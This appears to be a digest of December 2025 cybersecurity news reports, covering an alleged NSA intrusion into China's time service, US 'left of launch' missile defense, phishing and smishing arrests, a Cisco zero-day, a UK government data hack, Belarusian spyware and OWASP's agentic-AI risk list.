So far, Doublespeed is only active on TikTok, though it has plans to expand to Instagram, Reddit, and X-formerly-Twitter. When it does, it seems all bets are off — with social media engagement, and all the influence it entails, being relegated to the highest bidder.
The Chinese Ministry of State Security intelligence service disclosed in October that the U.S. National Security Agency has been engaged in a three-year cyber campaign to break into the official National Time Service Center.
The center is located in the north-central city of Xian. It provides precision time services that state media say are vital for military systems, communications, finance, electricity, transportation and mapping.
The NSA had no comment on the report, but defense analysts say the Chinese report is a significant clue to one of the most secret programs in support of an advanced form of strategic missile defense called “left of launch.”
Left of launch refers to a timeline for using various military tools, such as cyberattacks that could cause missiles to blow up in silos when launch buttons are pushed, special operations commandos and on-the-ground sabotage after a missile is detected being readied for firing.
The project to conduct prelaunch attacks and sabotage of missile systems has been underway for at least a decade, and its elements are among the U.S. military’s most closely guarded secrets.
Asked recently how left of launch will be used in President Trump’s forthcoming Golden Dome defense system to prevent a missile from being fired, Space Force Gen. Michael A. Guetlein, vice chief of space operations, said cryptically: “Can’t talk about it.”
PNT satellite system
Gaining access to China’s central time system would provide a major advantage to the U.S. military and military intelligence services during a conflict by allowing hackers to disrupt missile strikes before launch or shortly after launch, known as the boost phase.
The time center is a key element of China’s BeiDou satellite navigation system, a copy of the U.S. GPS, which uses more than 35 satellites to provide the People’s Liberation Army with vital PNT — positioning, navigation and timing — for its missile systems.
The satellite system is said to provide “centimeter-level” precision and is linked to the National Time Service Center.
Theoretically, NSA cyber sleuths, by breaching the time center, could have planted malicious software inside the PNT data chain that could then be used for intelligence gathering on missile targets and providing false navigation parameters for missile strikes.
U.S. advanced artificial intelligence technology also could fashion prelaunch disruptions that could retarget Chinese missiles against Beijing.
A Chinese state media report on the NSA cyberattacks stated that control over timing is equivalent to “controlling the heartbeat of modern society.”
“Once the timing system is interfered with or hijacked, the consequences are unimaginable,” the online Chinese communications outlet C114 reported. It noted potential disruptions of financial markets, power grids, rail lines and military systems.
For missile systems, PNT is an essential element for real-time location, direction and precise time data used for accurate targeting, trajectory control and command and control.
“There’s no doubt that the best time to defeat a missile is before it’s launched,” said Todd Harrison, a defense expert with the American Enterprise Institute. “The most obvious way is to track and destroy the launchers and the command and control infrastructure and sensors that enable them.”
Conducting the attacks is difficult because of the distances involved and the risks of escalation.
Various non-kinetic tools can be used to defeat a missile “kill chain” before launch, including jamming sensors and communications, and cyberattacks on command and control systems, Mr. Harrison said.
Electronic disruptions before launch can produce uncertain effectiveness during combat, even if they initially produce impacts, because thinking adversaries will adapt and overcome the disruptions.
“The question for Golden Dome is how much relative effort the architecture puts toward left of launch versus other phases of flight,” Mr. Harrison said. “Left of launch will surely be part of the approach, but we still don’t know how much emphasis it will garner.”
Sensors and capabilities
Mr. Trump’s executive order on missile defense, signed in January, specifically calls for developing and deploying left-of-launch capabilities for Golden Dome.
The order states that in addition to deploying defenses targeting missiles in midflight and terminal phases, the new system must “defeat missile attacks prior to launch and in the boost phase.”
Gen. Stephen Whiting, commander of U.S. Space Command, said in September that left-of-launch defenses will provide a next-generation missile defense capability.
Prelaunch defenses are needed because enemy missiles are becoming more precise and more lethal, he said at a defense conference.
“We are seeing both the capacity and the capability of the threat missiles we’re now facing rapidly increase,” Gen. Whiting said at the annual Air, Space & Cyber Conference. “Just look over the last 18 months in the Israel-Iran conflict … multiple salvos of missiles, not single-digit missiles, not double-digit missiles. We’re talking triple-digit missile salvos paired with one-way attack drones.”
Gen. Whiting said current missile defenses are capable of providing warning and tracking of traditional ballistic missiles, but newer high-speed hypersonic maneuvering missiles and space-based hypersonic missiles are “incredibly destabilizing.”
“Our missile defenses have done broadly a good job during the most recent conflicts, but most of those are focused on terminal engagement,” the general said.
“We want to be able to push that engagement to the left, and eventually left of launch,” he said.
To conduct such prelaunch strikes, greater sensor integration is needed, and more sophisticated cyberattacks will be used to “drive capabilities that allow us to affect targets before they even begin to launch,” Gen. Whiting said.
Robert Peters, senior research fellow for strategic deterrence and The Heritage Foundation, said one of the more promising elements of the Golden Dome will be deploying better overhead sensors and coupling them with theater defense sensors. The advanced sensors will enhance homeland missile defenses by providing significantly greater awareness of when enemy missiles are being readied for launch, and then provide more accurate data once a missile is fired.
“This better integration of data and sensors greatly increases a state’s ability to intercept missiles before they hit their targets,” Mr. Peters said.
Launch preparations for solid-fuel missiles in silos, such as China’s new fields of more than 350 intercontinental ballistic missiles in western China, will be more difficult to detect before launch.
Mobile ICBMs moved out of garrison in preparation for launch have signatures that can be tracked more easily as part of left-of-launch defenses, Mr. Peters said.
“Golden Dome, if done properly, will invest heavily in these types of sensor architectures, not simply on more and more modern interceptors, as critical as those are,” Mr. Peters said.
Israel’s military conducted a series of left-of-launch strikes on Iranian missiles before the joint U.S.-Israeli bombing raid on Iran’s key nuclear facilities.
The Israel Defense Forces released videos of airstrikes on several Iranian mobile missiles that were blown up before they could be fired in retaliatory attacks.
Israeli forces also conducted sabotage operations inside Iran. They neutralized some key missile technicians in the days before the June raid on three nuclear facilities, according to an Israeli think tank report.
In addition to better sensors and increased cyberattack capabilities, special operations forces also will be developed for prelaunch strikes on targets.
Left-of-launch options
Lt. Gen. Sean Farrell, deputy commander of U.S. Special Operations Command, said special operations commandos are working on left-of-launch missile defense capabilities for missiles and drones.
“We have been working left of launch on behalf of the [Defense] Department to try to understand how we can get after the threats before they become a threat,” Gen. Farrell said at the conference with Gen. Whiting. “I think a lot of that will translate as well if we’re able to synchronize and plan together at the strategic level on where we can bring left-of-launch attention to a layered approach to homeland defense.”
The ultimate goal of the layered and integrated missile defense is to deploy an array of forces across all military domains that can detect, disrupt and potentially stop missile threats before they emerge.
Left-of-launch capabilities have been a topic within the Pentagon since at least 2014, when a memorandum was disclosed from Chief of Naval Operations Adm. Jonathan Greenert and Army Chief of Staff Gen. Ray Odierno to the secretary of defense warning that missile defense spending was “unsustainable” because of sharp defense cuts.
The two military leaders called for building more cost-effective left-of-launch capabilities.
Defense officials at the time said the research for left of launch included non-kinetic weapons, such as cyberattacks and electronic warfare, including electromagnetic pulse attacks against missile command and control systems.
These weapons would be used after missile launch preparations are detected. They would disrupt or disable launch controls or send malicious commands to cause the missiles to explode on their launchers.
In 2016, Adm. William Gortney, then commander of U.S. Northern Command, stated in prepared congressional testimony that most missile defenses are designed to intercept missiles after launch, using ground-based interceptors, mobile regional defenses and ship-based anti-missile systems.
“We need to augment our defensive posture with one that is designed to defeat ballistic missile threats in the boost phase as well as before they are launched, known as ‘left of launch,’” Adm. Gortney said.
Other potential boost-phase defenses could include high-powered lasers deployed on drones or aircraft that can strike missiles just after launch.
All current missile defense systems use kinetic kill interceptors that require precision targeting data to knock out high-speed warheads. They include Patriot, Terminal High Altitude Area Defense, or THAAD, and large Ground-Based Interceptors in Alaska and California, an Aegis missile defense based mostly on ships and in several ground locations.
The Golden Dome will deploy space-based interceptors for the first time, providing greater coverage against missile threats.
Kenneth Todorov, former deputy director of the Missile Defense Agency and now vice president at Northrop Grumman Missile Defense Solutions, said the company is working on left-of-launch capabilities and counter-hypersonic missile efforts.
“With decades of experience supporting mission-critical defense programs across the entire kill chain, the company is bringing to bear a portfolio of advanced, innovative capabilities from left of launch, through detection and tracking, all the way to assessment of kill, delivering mission agility in addressing the evolving hypersonic threat,” Mr. Todorov said on the Northrop website.
Patrycja Bazylczyk, associate director of the Missile Defense Project at the Center for Strategic and International Studies, said left-of-launch defenses include a broad category of kinetic and non-kinetic efforts to counter enemy launches. They can include strikes on missile launchers, jamming enemy communications or infiltrating a missile factory.
“Left-of-launch efforts are not alternatives to active missile defenses; they work in tandem, allowing U.S. forces to more effectively counter enemy action rather than merely respond to it,” Ms. Bazylczyk said.
bleepingcomputer.com
By Bill Toulas
December 19, 2025
The Nigerian police have arrested three individuals linked to targeted Microsoft 365 cyberattacks via Raccoon0365 phishing-as-a-service.
The attacks led to business email compromise, data breaches, and financial losses affecting organizations worldwide.
The law enforcement operation was possible thanks to intelligence from Microsoft, shared with the Nigeria Police Force National Cybercrime Centre (NPF–NCCC) via the FBI.
The authorities identified individuals who administered the phishing toolkit ‘Raccoon0365,’ which automated the creation of fake Microsoft login pages for credential theft.
The service, which was responsible for at least 5,000 Microsoft 365 account compromises across 94 countries, was disrupted by Microsoft and Cloudflare last September.
It is unclear if the disruption operation helped identify those behind Raccoon0365 in Nigeria.
BleepingComputer contacted Microsoft for clarifications but a comment wasn't immediately available.
“Acting on precise and actionable intelligence, NPF–NCCC operatives were deployed to Lagos and Edo States, leading to the arrest of three suspects,” reads the police’s announcement.
“Search operations conducted at their residences resulted in the recovery of laptops, mobile devices, and other digital equipment, which have been linked to the fraudulent scheme after forensic analysis.”
One of the arrested suspects is an individual named Okitipi Samuel, also known online as “RaccoonO365” and “Moses Felix,” whom the police believe is the developer of the phishing platform.
Samuel operated a Telegram channel where he sold phishing kits to other cybercriminals in exchange for cryptocurrency, while he also hosted the phishing pages on Cloudflare using accounts registered with compromised credentials.
The Telegram channel counted over 800 members around the time of the disruption, and the reported access fees ranged from $355/month to $999/3 months.
Cloudflare estimates that the service is used primarily by Russia-based cybercriminals.
Regarding the other two arrested individuals, the police stated they have no evidence linking them to the Raccoon0365 operation or creation.
The person that Microsoft previously identified as the leader of the phishing service, Joshua Ogundipe, is not mentioned in the police’s announcement.
techcrunch.com
Lorenzo Franceschi-Bicchierai
12:15 PM PST · December 19, 2025
On Wednesday, Cisco revealed that a group of Chinese government-backed hackers is exploiting a vulnerability to target its enterprise customers who use some of the company’s most popular products.
Cisco has not said how many of its customers have already been hacked, or may be running vulnerable systems. Now, security researchers say there are hundreds of Cisco customers who could potentially be hacked.
Piotr Kijewski, the chief executive of the nonprofit Shadowserver Foundation that scans and monitors the internet for hacking campaigns, told TechCrunch that the scale of exposure “seems more in the hundreds rather than thousands or tens of thousands.”
Kijewski said the foundation was not seeing widespread activity, presumably because “current attacks are targeted.”
Shadowserver has a page where it’s tracking the number of systems that are exposed and vulnerable to the flaw disclosed by Cisco, named officially as CVE-2025-20393. The vulnerability is known as a zero-day, because the flaw was discovered before the company had time to make patches available. As of press time, India, Thailand, and the United States collectively have dozens of affected systems within their borders.
Censys, a cybersecurity firm that monitors hacking activities across the internet, is also seeing a limited number of affected Cisco customers. According to a blog post, Censys has observed 220 internet-exposed Cisco email gateways, one of the products known to be vulnerable.
In its security advisory published earlier this week, Cisco said that the vulnerability is present in software found in several products, including its Secure Email Gateway and its Secure Email and Web Manager.
Cisco said these systems are only vulnerable if they are reachable from the internet, and have its “spam quarantine” feature enabled. Neither of those two conditions are enabled by default, per Cisco, which would explain why there appears to be, relatively speaking, not that many vulnerable systems on the internet.
Cisco did not respond to a request for comment, asking if the company could corroborate the numbers seen by Shadowserver and Censys.
The bigger problem with this hacking campaign is that there are no patches available. Cisco recommends that customers wipe and “restore an affected appliance to a secure state,” as a way to remediate any breach.
“In case of confirmed compromise, rebuilding the appliances is, currently, the only viable option to eradicate the threat actors persistence mechanism from the appliance,” the company wrote in its advisory.
According to Cisco’s threat intelligence arm Talos, the hacking campaign has been ongoing since “at least late November 2025.”
bbc.com
Sam Francis
Political reporter
19.12.2025
The trade minister says information was accessed and an investigation has been launched.
Government data has been stolen in a hack though officials believe the risk to individuals is "low", a minister has said.
Trade Minister Chris Bryant told BBC Breakfast "an investigation is ongoing" into the hack, adding that the security gap was "closed pretty quickly".
A Chinese affiliated group is suspected of being behind the attack, but Bryant said investigators "simply don't know as yet" who is responsible.
That data is understood to have been on systems operated on the Home Office's behalf by the Foreign Office, whose staff detected the incident.
"We think that it's a fairly low-risk that individuals will have been compromised or affected," Bryant said.
It comes after the Sun newspaper reported that hackers affiliated to the Chinese state accessed the data in October with information possibly including visa details targeted.
The incident has been referred to the Information Commissioners Office.
UK intelligence agencies have warned about increasing, large-scale espionage from China, using cyber and other means, and targeting commercial and political information.
The cyber-agency GCHQ said last year that it was devoting more resources to counter threats from China than any other nation.
"Government facilities are always going to be potentially targeted," Bryant said on Friday.
"We are working through the consequences of what this is."
"This is a part of modern life that we have to tackle and deal with," Bryant added, pointing to major hacks in recent years at Jaguar Land Rover, Marks & Spencer and the British Library.
Confirmation of a hack by a Chinese state group would be awkward for the government ahead of a planned visit to Beijing next year by Sir Keir Starmer, the first by a UK prime minister since 2018.
The Labour government has said it is important to engage with China as it cannot be ignored on trade, climate change and other major issues, but face-to-face meetings also provide a forum for robust exchanges about issues affecting UK security.
The Chinese government has consistently denied it backs cyber-attacks targeting the UK.
Last year, responding to the UK government's National Security Strategy, a spokesperson for the Chinese embassy in London said "accusations such as Chinese espionage, cyber-attacks, and transnational repression against the UK are entirely fabricated, malicious slander".
Earlier this month, Sir Keir said UK government policy towards China could not continue to blow "hot and cold".
Failing to navigate a relationship with China, he said, would be a "dereliction of duty" when China is a "defining force in technology, trade and global governance".
Building a careful relationship would instead bolster the UK's place as a leader on the international stage and help secure UK national interests, Sir Keir said, while still recognising the "reality" that China "poses national security threats".
| Commsrisk
By
Eric Priezkalns
15 Dec 2025
Serbia’s Ministry of Internal Affairs has issued a statement and photographs relating to the arrest of two Chinese nationals who sent smishing SMS messages from a fake base station. The messages included links to websites which impersonated reputable public and private sector organizations including mobile operators. The websites asked for the details of the payment cards belonging to victims. The information obtained from victims was then used to purchase goods and services abroad.
This appears to be the first reported case of its type in Serbia. Nothing was said about the location in Serbia where the men were caught but the police reportedly searched multiple apartments and business premises. The two arrested men, aged 33 and 34, were said to be working for an organized criminal gang that operates across ‘several’ European countries.
Regular readers of Commsrisk may also notice a telltale sign that these criminals are connected to SMS blasting smishers found elsewhere. Photographs of the equipment found in their car show they possessed a distinctive orange DC-AC power converter of a type also used in conjunction with SMS blasters seized in many other countries. Scroll down for the photographs of the equipment found in Serbia.
Commsrisk uses AI-powered search to maintain the most comprehensive global map of reported SMS blasters. This incident has been added to the map.
Photographs from the Serbian government of the seized equipment are reproduced below. A video of the two men being arrested is here. Look here for this news per the official Instagram account of the Serbian Ministry of Internal Affairs.
therecord.media
Forensic researchers at Reporters Without Borders (RSF) have found a previously unknown spyware tool on a Belarusian journalist’s phone, the nonprofit said Wednesday.
The organization said it believes the spyware has been in use since at least 2021 based on its analysis comparing samples on an antivirus platform. Dubbed ResidentBat, the spyware can access call logs, SMS and encrypted app messages, microphone recordings, locally stored files and screen captures. It is used to target Android phones.
The journalist and RSF believe the spyware was installed while the journalist was detained by the Belarusian KGB. The phone was seized during questioning and authorities at one point forced the journalist to unlock the phone, RSF said in a press release.
Similar examples of authoritarian regimes installing spyware on journalists' phones while they are being questioned by police or security services have occurred recently in Serbia and Kenya.
“Growing list of cases where authoritarian regimes use detention to implant spyware on phones,” John Scott-Railton, a digital forensic researcher at Citizen Lab, said in a social media post. “Important investigation and reminder that dictators don't always need zero-days.”
In December 2024, Citizen Lab reported it had found spyware secretly placed on a phone belonging to a Russian programmer accused of supporting Ukraine after he was released from custody by Russian authorities.
The recent infection targeting the Belarusian journalist came to light after antivirus software on their phone flagged “suspicious components” a few days after their detention. The journalist contacted the Eastern European nonprofit RESIDENT.NGO, which analyzed the phone with RSF.
“By deploying surveillance technologies such as ResidentBat, the Belarusian state is pursuing a deliberate strategy of repression against independent journalism,” Antoine Bernard, RSF’s director of advocacy and assistance, said in a statement. “The systematic invasion of their private and professional lives amounts to a direct and unlawful assault on press freedom and fundamental rights.”
Belarus ranks 166th out of 180 countries and territories on a press freedom survey conducted by the organization.
RSF said it has made Google aware of its findings, and the tech giant plans to send a threat notification to all Google users identified as targets of the spyware campaign.
| TechCrunch techcrunch.com
Lorenzo Franceschi-Bicchierai
7:37 AM PST · December 12, 2025
Hama Film makes photo booths that upload pictures and videos online. But their back-end systems have a simple flaw that allows anyone to download customer pictures.
A company that makes photo booths is exposing pictures and videos of its customers online thanks to a simple flaw in its website where the files are stored, according to a security researcher.
The researcher, who goes by Zeacer, alerted TechCrunch to the security issue in late November after reporting the vulnerability in October to Hama Film, the photo booth maker that has franchise presence in Australia, the United Arab Emirates, and the United States, but did not hear back.
Zeacer shared with TechCrunch a sample of pictures taken from Hama Film’s servers, which showed groups of clearly young people posing in photo booths. Hama Film’s booths not only print out the photos like a typical photo booth, but booths also upload the customers’ photos to the company’s servers.
Vibecast, which owns Hama Film, has yet to respond to his messages alerting the company of the issues. Vibecast also hasn’t responded to several requests for comment from TechCrunch, nor did Vibecast’s co-founder Joel Park respond to a message we sent via LinkedIn.
As of Friday, the researcher said the company has still not fully resolved the security flaw and continues to expose customers’ data. As such, TechCrunch is withholding specific details of the vulnerability from publication.
When Zeacer first found this flaw, he noted that it appeared that photos were deleted from the photo booth maker’s servers every two to three weeks.
Now, he said, the pictures stored on the servers appear to get deleted after 24 hours, which limits the number of pictures exposed at any given time. But a hacker could still exploit the vulnerability he discovered each day and download the contents of every photo and video on the server.
Before this week, Zeacer said at one point he saw more than 1,000 pictures online for the Hama Film booths in Melbourne.
This incident is the latest example of a company that, at least for a time, was not implementing certain basic and widely accepted security practices, such as rate-limiting. Last month, TechCrunch reported that government contractor giant Tyler Technologies was not rate-limiting its websites used for allowing courts to manage their jurors’ personal information. This meant anyone could break into any juror’s profile by running a computer script capable of mass-guessing their date of birth and their easy-to-guess numerical identifier.
News provided by
OWASP
Dec 10, 2025, 03:03 ET
WILMINGTON, Del., Dec. 10, 2025 /PRNewswire/ -- The OWASP GenAI Security Project (genai.owasp.org), a leading global open-source and expert community dedicated to delivering practical guidance and tools for securing generative and agentic AI, today released the OWASP Top 10 for Agentic Applications, a key resource to help organizations identify and mitigate the unique risks posed by autonomous AI agents.
Following more than a year of research, review and refinement, this Top 10 list reflects a culmination of input from over 100 security researchers, industry practitioners, user organizations and leading cybersecurity and generative AI technology providers. The result is not only a list of risks and mitigations, but a suite of resources designed for practitioners providing data-driven guidance.
The framework was further evaluated by the GenAI Security Project's Agentic Security Initiative Expert Review Board, which includes representatives from recognized bodies around the world such as NIST, European Commission and the Alan Turing Institute, among others. A full list of contributing organizations can be found here.
"This new OWASP Top 10 reflects incredible collaboration between AI security leaders and practitioners across the industry," said Scott Clinton, the OWASP GenAI Security Project's Co-Chair, Board Member, and Co-Founder. "As AI adoption accelerates faster than ever, security best practices must keep pace. The community's responsiveness has been remarkable, and this Top 10, along with our broader open-source resources, ensures organizations are better equipped to adopt this technology safely and securely."
Agent Behavior Hijacking, Tool Misuse and Exploitation and Identity and Privilege Abuse are some of the highlighted threats within the Top 10 and they showcase how attackers can subvert agent capabilities or their supporting infrastructure. Incidents involving these agentic systems are increasingly capable across industries, elevating the need for these new resources.
"Companies are already exposed to Agentic AI attacks - often without realizing that agents are running in their environments," said Keren Katz, Co-Lead for OWASP's Top 10 for Agentic AI Applications and Senior Group Manager of AI Security at Tenable. "While the threat is already here, the information available about this new attack vector is overwhelming. Effectively protecting a company against Agentic AI requires not only strong security intuition but also a deep understanding of how AI agents fundamentally operate."
"Agentic AI introduces a fundamentally new threshold of security challenges, and we are already seeing real incidents emerge across industry," said John Sotiropoulos, GenAI Security Project Board member, Agentic Security Initiative and Top 10 for Agentic Applications Co-lead, and Head of AI Security at Kainose. "Our response must match the pace of innovation, which is why this Top 10 focuses on practical, actionable guidance grounded in real-world attacks and mitigations. This release marks a pivotal moment in securing the next generation of autonomous AI systems."
The Top 10 for Agentic Applications joins a growing portfolio peer-reviewed resources released by the OWASP GenAI Security Project and its Agentic Security Initiative, including:
The State of Agentic Security and Governance 1.0: A practical guide to the governance and regulations for the safe and responsible deployment of autonomous AI systems.
The Agentic Security Solutions Landscape: A quarterly, peer-reviewed map of open-source and commercial agentic AI tools and how they support SecOps and mitigate DevOps–SecOps risks.
A Practical Guide to Securing Agentic Applications: Practical technical guidance for securely designing and deploying LLM-powered agentic applications.
Reference Application for Agentic Security: An OWASP FinBot Capture The Flag applications , designed to test and practice agentic security skills in a controlled environment.
Agentic AI Threats and Mitigations: This document is the first in a series to provide a threat-model-based reference of emerging agentic threats and discuss mitigations.
And more
"Over the past two and a half years, the OWASP Top 10 for LLM Applications has shaped much of the industry's thinking on AI security," said, Steve Wilson, OWASP GenAI Security Project Board Co-Chair, Founder of OWASP Top 10 for LLM, and CPO of Exabeam, Inc. "This year, we've seen agentic systems move from experiments to real deployments, and that shift brings a different class of threats into clear view. Our team met that challenge by expanding our guidance to address how agentic systems behave, interact, and make decisions. The LLM Top 10 will remain a core, regularly updated resource, and aligning both efforts is key to helping the community build safer, more reliable intelligent systems.
Discover what industry experts, researchers and leading global organizations have to say about the new Top 10 for Agentic Applications here.
The OWASP GenAI Security Project invites organizations, researchers, policymakers and practitioners to access the new Top 10 for Agentic Applications, contribute to future updates and join the global effort to build secure, trustworthy AI systems. Visit our site to learn more and how you can contribute.
About OWASP Gen AI Security Project
The OWASP Gen AI Security Project (genai.owasp.org) is a global, open-source initiative and expert community dedicated to identifying, mitigating, and documenting security and safety risks associated with generative AI technologies, including large language models (LLMs), agentic AI systems, and AI-driven applications. Our mission is to empower organizations, security professionals, AI practitioners, and policymakers with comprehensive, actionable guidance and tools to ensure the secure development, deployment, and governance of generative AI systems. Visit our site to learn more.